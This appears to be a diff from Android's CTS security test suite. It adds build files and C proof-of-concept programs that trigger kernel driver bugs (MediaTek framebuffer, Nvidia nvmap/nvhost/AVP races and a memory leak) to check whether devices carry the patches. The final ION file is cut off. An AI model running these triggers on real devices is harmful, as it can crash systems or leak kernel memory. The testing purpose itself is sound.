+ MTK_FB_FORMAT_ABGR8888 = MAKE_MTK_FB_FORMAT_ID(5, 4),
+ MTK_FB_FORMAT_YUV422 = MAKE_MTK_FB_FORMAT_ID(6, 2),
+ MTK_FB_FORMAT_XRGB8888 = MAKE_MTK_FB_FORMAT_ID(7, 4),
+ MTK_FB_FORMAT_XBGR8888 = MAKE_MTK_FB_FORMAT_ID(8, 4),
+ MTK_FB_FORMAT_UYVY = MAKE_MTK_FB_FORMAT_ID(9, 2),
+ MTK_FB_FORMAT_YUV420_P = MAKE_MTK_FB_FORMAT_ID(10, 2),
+ MTK_FB_FORMAT_YUY2 = MAKE_MTK_FB_FORMAT_ID(11, 2),
+ MTK_FB_FORMAT_BPP_MASK = 0xFF,
+ } MTK_FB_FORMAT;
+
+#define GET_MTK_FB_FORMAT_BPP(f) ((f) & MTK_FB_FORMAT_BPP_MASK)
+
+
+#ifdef __cplusplus
+}
+#endif
+#endif /* __DISP_DRV_H__ */
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8448/poc.c
new file mode 100644
index 0000000..e5f675b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8448/poc.c
@@ -0,0 +1,59 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <sys/mman.h>
+#include <fcntl.h>
+//#include <pthread.h>
+#include <sys/prctl.h>
+#include <unistd.h>
+#include <stdbool.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <asm-generic/ioctl.h>
+#include "mtkfb.h"
+int main(int argc, char **argv) {
+ int fd = 0;
+ struct fb_overlay_layer layerInfo;
+ memset(&layerInfo, 0, sizeof(layerInfo));
+ fd = open("/dev/graphics/fb0", O_RDWR);
+ if (fd < 0) {
+ perror("open /dev/graphics/fb0");
+ exit(-1);
+ }
+ printf("Device file opened successfully\n");
+ printf("Trying to get layer info\n");
+ if(ioctl(fd, MTKFB_GET_OVERLAY_LAYER_INFO, &layerInfo) == -1) {
+ perror("ioctl MTKFB_GET_OVERLAY_LAYER_INFO failed");
+ exit(-2);
+ }
+ printf("Got layer info\n");
+ printf("Trying to set layer info\n");
+ // set any huge value here
+ int curr_val = 0xf1111111;
+ while(1) {
+ layerInfo.layer_id = curr_val;
+ if(ioctl(fd, MTKFB_SET_OVERLAY_LAYER, &layerInfo) == -1) {
+ perror("ioctl MTKFB_SET_OVERLAY_LAYER failed");
+ //exit(-2);
+ }
+ curr_val--;
+ if(curr_val == -1) {
+ break;
+ }
+ }
+ printf("Set layer info\n");
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8449/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8449/Android.mk
new file mode 100644
index 0000000..ce1e1bb
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8449/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8449
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8449/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8449/poc.c
new file mode 100755
index 0000000..1e76b55
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8449/poc.c
@@ -0,0 +1,143 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <string.h>
+#include <errno.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno))
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+#define CLOSE_THREAD_NUM 100
+#define TRY_TIMES 900
+
+#define DEV "/dev/tegra_avpchannel"
+
+#define NVAVP_IOCTL_MAGIC 'n'
+
+struct nvavp_channel_open_args {
+ __u32 channel_fd;
+};
+
+#define NVAVP_IOCTL_CHANNEL_OPEN _IOR(NVAVP_IOCTL_MAGIC, 0x73, \
+ struct nvavp_channel_open_args)
+
+int fd;
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ ERR("[-] set affinity failed");
+ }
+ return ret;
+}
+
+volatile int target_fd;
+volatile int attack;
+void* close_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(attack){
+ close(target_fd);
+ }
+
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+ struct nvavp_channel_open_args o_args = { 0 };
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV, O_RDONLY);
+ if(fd == -1){
+ ERR("[-] open failed");
+ return 0;
+ } else {
+ LOG("[+] open OK");
+ }
+
+ #if 1
+ ret = ioctl(fd, NVAVP_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ goto out_dev;
+ } else {
+ LOG("[+] ioctl OK, fd = %d", o_args.channel_fd);
+ }
+
+ target_fd = o_args.channel_fd;
+ #endif
+
+ /* create close thread */
+ #if 1
+ attack = 1;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
+ if(ret){
+ ERR("[-] create close thread %d failed", i);
+ goto out_close_thread;
+ }
+ }
+ #endif
+
+ #if 1
+ for(i = 0; i < TRY_TIMES; i++){
+ LOG("[+] %03d times", i);
+ /* open */
+ ret = ioctl(fd, NVAVP_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ } else {
+ LOG("[+] ioctl OK, fd = %d", o_args.channel_fd);
+ }
+ //usleep(200);
+ }
+ #endif
+
+out_close_thread:
+ attack = 0;
+ /* kill close thread */
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ if(close_thread_id[i])
+ pthread_join(close_thread_id[i], NULL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8460/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8460/Android.mk
new file mode 100644
index 0000000..b9c51d1
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8460/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8460
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS := -Wall -W -g -O2 -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8460/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8460/poc.c
new file mode 100755
index 0000000..78d41e5
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8460/poc.c
@@ -0,0 +1,165 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <errno.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+
+struct nvmap_handle_param {
+ __u32 handle; /* nvmap handle */
+ __u32 param; /* size/align/base/heap etc. */
+ unsigned long result; /* returns requested info*/
+};
+
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+
+struct nvmap_pin_handle {
+ __u32 *handles; /* array of handles to pin/unpin */
+ unsigned long *addr; /* array of addresses to return */
+ __u32 count; /* number of entries in handles */
+};
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+
+struct nvmap_pin_handle_32 {
+ __u32 handles; /* array of handles to pin/unpin */
+ __u32 addr; /* array of addresses to return */
+ __u32 count; /* number of entries in handles */
+};
+
+struct nvmap_map_caller_32 {
+ __u32 handle; /* nvmap handle */
+ __u32 offset; /* offset into hmem; should be page-aligned */
+ __u32 length; /* number of bytes to map */
+ __u32 flags; /* maps as wb/iwb etc. */
+ __u32 addr; /* user pointer*/
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PIN_MULT _IOWR(NVMAP_IOC_MAGIC, 10, struct nvmap_pin_handle)
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+#define NVMAP_IOC_PIN_MULT_32 _IOWR(NVMAP_IOC_MAGIC, 10, struct nvmap_pin_handle_32)
+#define NVMAP_IOC_MMAP_32 _IOWR(NVMAP_IOC_MAGIC, 5, struct nvmap_map_caller_32)
+
+/* common carveout heaps */
+#define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29)
+#define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28)
+#define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27)
+#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
+
+#define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1)
+
+/* allocation flags */
+#define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0)
+#define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0)
+#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
+#define NVMAP_HANDLE_CACHEABLE (0x3ul << 0)
+#define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0)
+
+#define NVMAP_HANDLE_SECURE (0x1ul << 2)
+#define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3)
+#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
+#define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5)
+#define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6)
+#define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7)
+
+
+int g_fd = -1;
+
+int open_driver() {
+ char* dev_path = "/dev/nvmap";
+ g_fd = open(dev_path, O_RDWR);
+ return g_fd;
+}
+
+
+int main(int argc, char**argv) {
+ if (open_driver() < 0) {
+ return -1;
+ }
+
+ int i;
+ int* handles = mmap((void*)0x20000000, 0x1000, PROT_READ | PROT_WRITE , MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS, -1, 0);
+ memset(handles, 0x42, 0x1000);
+ for (i = 0; i < 2; ++i) {
+ struct nvmap_create_handle op = {0};
+ op.size = 0x1000;
+ ioctl(g_fd, NVMAP_IOC_CREATE, &op);
+ handles[i] = op.handle;
+ struct nvmap_alloc_handle alloc = {0};
+ alloc.align = 0x1000;
+ alloc.handle = op.handle;
+ alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
+ alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
+ ioctl(g_fd, NVMAP_IOC_ALLOC, &alloc);
+ }
+
+ void* leak_addr = (void*) 0x10001000;
+ void* mmap_addr = mmap(leak_addr, 0x1000, PROT_READ | PROT_WRITE , MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS, -1, 0);
+ memset(leak_addr, 0x41, 0x1000);
+
+ unsigned long leaked_data = 0;
+ struct nvmap_pin_handle_32 pin = {0};
+ pin.count = 2;
+ pin.handles = (unsigned int) handles;
+ struct nvmap_pin_handle err_pin = {0};
+ err_pin.count = 0;
+ err_pin.handles = handles;
+ err_pin.addr = leak_addr + 8;
+
+ ioctl(g_fd, NVMAP_IOC_PIN_MULT, &err_pin); // construct op.addr
+ ioctl(g_fd, NVMAP_IOC_PIN_MULT_32, &pin);
+
+ for (i = 0; i < 10; ++i) {
+ if(((int*)leak_addr)[i] != 0x41414141 && 0 == leaked_data) {
+ leaked_data = (unsigned long)((int*)leak_addr) + i;
+ }
+ }
+
+ if (leaked_data) {
+ printf("Vulnerable");
+ }
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8482/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8482/Android.mk
new file mode 100644
index 0000000..b41fb16
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8482/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8482
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8482/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8482/poc.c
new file mode 100644
index 0000000..41862a5
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8482/poc.c
@@ -0,0 +1,205 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+// for syscall
+#include <sys/syscall.h>
+// for futex
+#include <linux/futex.h>
+#include <sys/time.h>
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt ": %d(%d)\n", ##__VA_ARGS__, errno, errno)
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+
+#define NVMAP_IOC_MAGIC 'N'
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+
+#define NVHOST_IOCTL_MAGIC 'H'
+struct nvhost_set_error_notifier {
+ __u64 offset;
+ __u64 size;
+ __u32 mem;
+ __u32 padding;
+};
+#define NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER \
+ _IOWR(NVHOST_IOCTL_MAGIC, 111, struct nvhost_set_error_notifier)
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ printf("[-] set affinity failed: [%d]-%d\n", errno, errno);
+ }
+ return ret;
+}
+
+struct nvhost_submit_args {
+ __u32 submit_version;
+ __u32 num_syncpt_incrs;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 timeout;
+ __u32 flags;
+ __u32 fence; /* Return value */
+ __u64 syncpt_incrs;
+ __u64 cmdbuf_exts;
+
+ __u64 pad[3]; /* future expansion */
+
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 reloc_shifts;
+ __u64 waitchks;
+ __u64 waitbases;
+ __u64 class_ids;
+ __u64 fences;
+};
+#define NVHOST_IOCTL_CHANNEL_SUBMIT \
+ _IOWR(NVHOST_IOCTL_MAGIC, 26, struct nvhost_submit_args)
+
+struct nvhost_syncpt_incr {
+ __u32 syncpt_id;
+ __u32 syncpt_incrs;
+};
+
+#define CLOSE_THREAD_NUM 1
+#define TRY_TIMES 2
+#define NVMAPDEV "/dev/nvmap"
+#define VICDEV "/dev/nvhost-vic"
+#define SYNC_NUM 1
+struct nvhost_set_error_notifier err1 = { 0 }, err2 = { 0 };
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+int nvmap, vic;
+volatile int attack;
+void* close_thread(void* no_use)
+{
+ int ret;
+ set_affinity(1);
+
+ while(attack){
+ ret = ioctl(vic, NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER, &err1);
+ }
+
+ return NULL;
+}
+
+int main()
+{
+ int i, j, ret;
+ int dma1, dma2;
+ struct nvmap_create_handle args = {
+ .size = PAGE_SIZE
+ };
+ struct nvmap_alloc_handle alloc = {
+ .heap_mask = 0xFFFFFFFF
+ };
+
+ struct nvhost_syncpt_incr incr[SYNC_NUM];
+
+ struct nvhost_submit_args submit = {
+ .num_syncpt_incrs = SYNC_NUM,
+ .syncpt_incrs = (intptr_t)incr,
+ .timeout = 1,
+ //.class_ids = (intptr_t)&ret
+ };
+
+ memset(incr, 0, sizeof(incr));
+ incr[0].syncpt_id = 6;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ nvmap = open(NVMAPDEV, O_RDONLY);
+ if(nvmap == -1)
+ ERR("[-] open %s failed", NVMAPDEV);
+ else
+ LOG("[+] open %s OK", NVMAPDEV);
+
+ vic = open(VICDEV, O_RDONLY);
+ if(vic == -1)
+ ERR("[-] open %s failed", VICDEV);
+ else
+ LOG("[+] open %s OK", VICDEV);
+
+ // prepare
+ ret = ioctl(nvmap, NVMAP_IOC_CREATE, &args);
+ if(ret)
+ ERR("[-] ioctl NVMAP_IOC_CREATE failed");
+ else
+ LOG("[+] NVMAP_IOC_CREATE succeeded, fd = %d", args.handle);
+
+ dma1 = args.handle;
+ err1.mem = dma1;
+ alloc.handle = dma1;
+
+ ret = ioctl(nvmap, NVMAP_IOC_ALLOC, &alloc);
+ if(ret)
+ ERR("[-] ioctl NVMAP_IOC_ALLOC failed");
+ else
+ LOG("[+] NVMAP_IOC_ALLOC succeeded");
+
+ /* create close thread */
+ attack = 1;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
+ }
+ LOG("[+] running...");
+ while(1) {
+ ret = ioctl(vic, NVHOST_IOCTL_CHANNEL_SUBMIT, &submit);
+ }
+
+ LOG("[-] passed :(");
+ attack = 0;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++) {
+ pthread_join(close_thread_id[i], NULL);
+ }
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-9120/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-9120/Android.mk
new file mode 100644
index 0000000..95ddb3d
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-9120/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-9120
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-9120/poc.c b/hostsidetests/security/securityPatch/CVE-2016-9120/poc.c
new file mode 100644
index 0000000..c03ee45
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-9120/poc.c
@@ -0,0 +1,175 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <errno.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+typedef int ion_user_handle_t;
+
+enum ion_heap_type {
+ ION_HEAP_TYPE_SYSTEM,
+ ION_HEAP_TYPE_SYSTEM_CONTIG,
+ ION_HEAP_TYPE_CARVEOUT,
+ ION_HEAP_TYPE_CHUNK,
+ ION_HEAP_TYPE_DMA,
+ ION_HEAP_TYPE_CUSTOM, /* must be last so device specific heaps always
+ are at the end of this enum */
+ ION_NUM_HEAPS = 16,
+};
+
+#define ION_HEAP_SYSTEM_MASK (1 << ION_HEAP_TYPE_SYSTEM)
+#define ION_HEAP_SYSTEM_CONTIG_MASK (1 << ION_HEAP_TYPE_SYSTEM_CONTIG)
+#define ION_HEAP_CARVEOUT_MASK (1 << ION_HEAP_TYPE_CARVEOUT)
+#define ION_HEAP_TYPE_DMA_MASK (1 << ION_HEAP_TYPE_DMA)
+
+#define ION_NUM_HEAP_IDS sizeof(unsigned int) * 8
+
+struct ion_allocation_data {
+ size_t len;
+ size_t align;
+ unsigned int heap_id_mask;
+ unsigned int flags;
+ ion_user_handle_t handle;
+};
+
+
+struct ion_fd_data {
+ ion_user_handle_t handle;
+ int fd;
+};
+
+
+struct ion_handle_data {
+ ion_user_handle_t handle;
+};
+
+
+struct ion_custom_data {
+ unsigned int cmd;
+ unsigned long arg;
+};
+#define ION_IOC_MAGIC 'I'
+
+#define ION_IOC_ALLOC _IOWR(ION_IOC_MAGIC, 0, \
+ struct ion_allocation_data)
+
+#define ION_IOC_FREE _IOWR(ION_IOC_MAGIC, 1, struct ion_handle_data)
+
+
+#define ION_FLAG_CACHED 1 /* mappings of this buffer should be
+ cached, ion will do cache
+ maintenance when the buffer is
+ mapped for dma */
+#define ION_FLAG_CACHED_NEEDS_SYNC 2 /* mappings of this buffer will created
+ at mmap time, if this is set
+ caches must be managed manually */
+
+int g_fd = -1;
+struct ion_allocation_data* g_allocation = NULL;
+struct ion_handle_data g_free_data;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
